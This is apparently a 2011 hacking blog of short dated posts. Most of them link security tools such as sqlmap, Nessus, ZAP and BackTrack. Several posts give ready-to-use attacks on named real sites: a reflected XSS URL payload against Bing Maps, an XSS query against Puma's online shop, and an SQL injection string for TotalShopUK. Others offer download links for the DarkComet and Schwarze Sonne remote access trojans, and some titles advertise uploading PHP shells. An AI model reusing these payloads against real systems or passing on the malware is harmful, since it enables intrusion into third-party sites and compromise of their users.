Wednesday, 24. August 2011
Upload a PHP shell
uploading a shell



IPB Shell uploading



Sqlmap - Automatic SQL Injection Tool
Automatic tools play an important role in penetration testing, whether the test is conducted against a network or a web application.

Web application penetration testing is very important for high-profile companies and for services such as e-commerce, in order to secure users' data.


Key Features

It supports MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Full support for three SQL injection techniques: inferential blind SQL injection, UNION query (inband) SQL injection and batched queries support.
It supports anonymous proxies.
It supports HTTP header cookies.
Basic web server software and web application technology fingerprinting.
And more...

It is available for both the Windows and Linux platforms.

Download
Linux Source: sqlmap-0.9.tar.gz
http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.tar.gz/download
Windows Portable: sqlmap-exe.zip
http://downloads.sourceforge.net/sqlmap/sqlmap-0.7_exe.zip



Uniscan vulnerability scanner - Linux
The Uniscan vulnerability scanner is an information security tool that aims to find vulnerabilities in web systems. Uniscan was developed in the Perl programming language, which makes it easier to work with text and has easy-to-use regular expressions, and it is also multi-threaded.

It is dedicated to web application security: find vulnerabilities before others do. It can easily find known vulnerabilities, is regularly updated, and bug fixes and new features are added at regular intervals.

Tutorials to create plug-ins:
http://www.uniscan.com.br/tutorial1.php
http://www.uniscan.com.br/tutorial2.php
http://www.uniscan.com.br/tutorial3.php


Download
http://www.uniscan.com.br/download.html



INSECT Pro 2.6.1
INSECT can help build a strong security posture and is easy to use, so both professional penetration testers and less experienced security pros have all the tools they need to reduce costs, proactively find vulnerabilities, assess risk, and check the effectiveness of security defenses.

The latest version includes more than 100 native exploits, 300 Metasploit modules and a web vulnerability scanner.

Download
http://www.insecurityresearch.com/files/download



Tuesday, 23. August 2011
BING.COM - XSS
Vendor Homepage : http://www.bing.com
Vulnerability Type : XSS Reflected

Description
------------------
BING.COM is prone to an XSS vulnerability because the application fails
to properly perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the
victim's browser.

Details
-------------------
The reflected XSS vulnerability is a variant of a cross-site scripting
flaw: it occurs when the data provided by the attacker is executed by
the browser, and then displayed on "normal" pages returned to other
users in the course of regular browsing, without proper HTML escaping. A
classic example of this is with online message boards where users are
allowed to post HTML formatted messages for other users to read.

Exploit example as follows
-----------------------------

http://www.bing.com/maps/embed/Customize.aspx
?v=2
&cp=-34.59999847400003~-58.45000076200001
&lvl=6
&dir=0
&sty=c
&eo=
&where1=';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))//
&form=LMLTEW

The vulnerability is caused by the following code and affected by the
Generate Code map


by
runlvl



Clickjacking Tool
Among the features of the new tool are:

Use point-and-click to select the areas of a page to be targeted
Supports the new 'text-field injection' technique
Supports the new 'content extraction' technique
'Visible mode' replay allows a user to see how the technique works behind the scenes
'Hidden mode' replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.

Download
http://www.contextis.co.uk/resources/tools/clickjacking-tool/cjtool.zip



Google - help me
Source
http://pastebin.com/jCNvzw1s

by
xero



NESSUS - help me
How NESSUS works
http://www.cs.cmu.edu/~dwendlan/personal/nessus.html

How to use NESSUS
http://www.symantec.com/connect/articles/introduction-nessus

Download
http://www.nessus.org/products/nessus/nessus-download-agreement



ClubHack Mag Issue 19, August 2011
This issue covers Gonna’ Break It on Gonna’ Kick it Root Down in Tech Gyan, RSA Security in Moms Guide, SniffJoke – Defeating Interception Framework in Tool Gyan, Patent Law and Computer Technology in Legal Gyan, and Social Engineering Toolkit in Matriux Vibhag.

Download PDF
http://chmag.in/issue/aug2011.pdf



ClubHack Mag Issue 18-July2011
This issue covers the following articles:

0x00 Tech Gyan - Using Metasploit with Nessus Bridge on Ubuntu
0x01 Tool Gyan - Armitage – The Ultimate Attack Platform for Metasploit
0x02 Mom's Guide - Penetration Testing with Metasploit Framework
0x03 Legal Gyan - Trademark Law and Cyberspace
0x04 Matriux Vibhag - The Exploitation Ka Baap MSF

Download PDF
http://chmag.in/issue/jul2011.pdf



XSS - Cross Site Scripting Cheat Sheet and more...
If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you.
http://ha.ckers.org/xss.html

Here you find my custom XSS and CSRF cheat sheet
http://www.xenuser.org/xss-cheat-sheet/



Facebook Security Guide
Protecting your Facebook account
Avoiding the scammers (very helpful examples of the most popular Facebook scams)
Using advanced security settings (one-time passwords, secure browsing, single sign-on, social authentication, etc.)
Recovering a hacked Facebook account
Stopping imposters

Download PDF
https://www.facebook.com/safety/attachment/Guide%20to%20Facebook%20Security.pdf



Uniscan 4.0 vulnerability scanner
Uniscan Features

Identification of system pages through a Web Crawler.
Use of threads in the crawler.
Control of the maximum number of requests made by the crawler.
Control of variation of system pages identified by Web Crawler.
Control of file extensions that are ignored.
Test of pages found via the GET method.
Test the forms found via the POST method.
Support for SSL requests (HTTPS).
Proxy support.

Download
http://sourceforge.net/projects/uniscan/files/4.0/uniscan.tar/download



JonDoFox 2.5.3 - anonymous and secure
JonDoFox is a profile for the Mozilla Firefox web browser particularly optimized for anonymous and secure web surfing. For anonymous surfing you need an IP changer proxy too. We recommend our proxy tool JonDo, but you may use other anonymization services like Tor Onion Router.

Download
https://anonymous-proxy-servers.net/en/jondofox.html



update: OWASP Zed Attack Proxy v.1.3.2 Released
The OWASP Zed Attack Proxy (ZAP) is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing, as well as being a useful addition to an experienced pen tester's toolbox.

Download
http://code.google.com/p/zaproxy/downloads/list



tor2web: visit anonymous websites
Tor is a software project that lets you use the Internet anonymously. tor2web is a project to let Internet users access anonymous servers.

Source
http://tor2web.org/



Sunday, 21. August 2011
Schwarze Sonne RAT Beta 1
Public release : 20/08/2011

Download
https://code.google.com/p/schwarzesonenrat/



PUMA Online Shop - XSS
http://www.shop.puma.com
Type: XSS
Exploitable:
hxxp://www.shop.puma.com/on/demandware.store/Sites-US-Site/en_US/Search-Show?q=alert(1)



Origami – Analyze evil pdf - Linux
Origami is a Ruby framework designed to parse, analyze, and forge PDF documents. This is NOT a PDF rendering library. It aims at providing a scripting tool to generate and analyze malicious PDF files. As well, it can be used to create on-the-fly customized PDFs, or to inject code into already existing documents.

Download
Origami uses the Mercurial repository that can be accessed with this command:
hg clone https://origami-pdf.googlecode.com/hg/ origami



Skype - HTML/Javascript Code Injection
Source
http://www.noptrix.net/advisories/skype_inject.txt



Malware goes to the Movies
http://vimeo.com/26479672



DarkComet-RAT v4.0
Public release : 20/08/2011 at 17:35

Download
http://www.darkcomet-rat.com/



Multiple CMS Hash Cracker - Perl
Source
http://pastebin.com/Ny3WLPpu



TotalShopUK 1.7.2 - SQL
http://www.totalshopuk.com

Exploit:
products/c/index.php/1'

by
Eyüp CELIK



Friday, 19. August 2011
Most Read: Top 5
1. http://securityxploit.blogger.de/stories/1859047/
2. http://securityxploit.blogger.de/stories/1864857/
3. http://securityxploit.blogger.de/stories/1857035/
4. http://securityxploit.blogger.de/stories/1846646/
5. http://securityxploit.blogger.de/stories/1854802/



BackTrack 5 R1 Released
This release contains over 120 bug fixes, 30 new tools and 70 tool updates.
The kernel was updated to 2.6.39.4 and includes the relevant injection patches.

Download
http://www.backtrack-linux.org/downloads/

For the first few days there will be torrent downloads only.
HTTP downloads will be available from Aug 20th.



Thursday, 18. August 2011
RAFT - Linux
RAFT is a testing tool for the identification of vulnerabilities in web applications. It is a suite of tools that utilize common shared elements to make testing and analysis easier. It uses markup by means of a built-in WebKit based web browser to create templates for fuzz testing.

Download
RAFT 2011.7.14-alpha
svn checkout http://raft.googlecode.com/svn/trunk/ raft-read-only
